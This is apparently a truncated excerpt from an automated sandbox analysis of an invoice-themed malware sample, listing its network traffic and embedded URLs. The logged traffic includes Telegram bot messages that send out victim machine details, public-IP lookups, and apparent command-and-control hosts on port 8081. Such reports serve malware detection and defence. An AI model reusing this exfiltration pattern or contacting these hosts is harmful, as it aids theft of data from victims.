          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.22:49165 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49171 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%203/15/2025%20/%204:20:21%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%203/15/2025%20/%2012:30:26%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 09:19:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 09:19:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: RegSvcs.exe, 00000007.00000002.880149277.000000000280B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002704000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002703000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002796000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002704000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002747000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002797000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002746000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002703000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002796000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000689000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000267D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: RegSvcs.exe, 00000007.00000002.882248172.00000000052E4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.882371515.00000000056C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: INV000001203.scr, bZqCbFmlynN.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: INV000001203.scr, bZqCbFmlynN.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: RegSvcs.exe, 00000007.00000002.882248172.00000000052E4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.882371515.00000000056C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmp, INV000001203.scr, bZqCbFmlynN.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002725000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000027B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000027AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000271B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002796000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: INV000001203.scr, 00000000.00000002.378776328.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, bZqCbFmlynN.exe, 00000008.00000002.390367824.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000267D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: RegSvcs.exe, 00000007.00000002.879662966.0000000000696000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879461153.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: RegSvcs.exe, 00000007.00000002.880149277.000000000280B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: INV000001203.scr, 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmp, INV000001203.scr, 00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.000000000280B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002814000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.879332625.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: RegSvcs.exe, 00000007.00000002.880149277.000000000280B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: RegSvcs.exe, 00000007.00000002.880149277.000000000280B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.0000000002814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
          Source: RegSvcs.exe, 00000007.00000002.881474042.00000000036DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/image
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000292D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: RegSvcs.exe, 00000007.00000002.880149277.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002912000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.881474042.0000000003728000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.880149277.0000000002925000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.881584025.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.880171313.000000000291A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 